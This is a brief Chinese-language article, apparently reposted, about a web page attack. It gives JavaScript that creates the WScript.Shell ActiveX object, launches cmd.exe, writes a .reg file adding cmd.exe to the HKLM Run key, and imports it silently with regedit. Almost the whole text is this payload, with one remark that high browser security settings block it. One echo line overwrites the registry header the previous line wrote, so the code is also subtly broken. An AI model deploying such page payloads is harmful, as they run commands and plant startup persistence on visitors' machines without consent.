HTML網頁漏洞攻擊


作者:鄔畏畏

      在網頁中我們可以利用javascript執行客戶端的WSH,下面代碼展示了在網頁中創建WSH對象並且運行cmd.exe創建文件並操作注冊表。

document.write("<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></object>");
wsh.Run('cmd.exe');

wsh.Run('cmd.exe /c echo Windows Registry Editor Version 5.00>>auto.reg');
wsh.Run('cmd.exe /c echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]>auto.reg');
wsh.Run('cmd.exe /c echo @="cmd.exe">>auto.reg');
wsh.Run('cmd.exe /c regedit /s auto.reg');

上述代碼存為HTML格式。

     當然如果瀏覽器的安全級別設置的較高(如:禁用ActiveX等相關設置),上述代碼就沒有威脅了。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM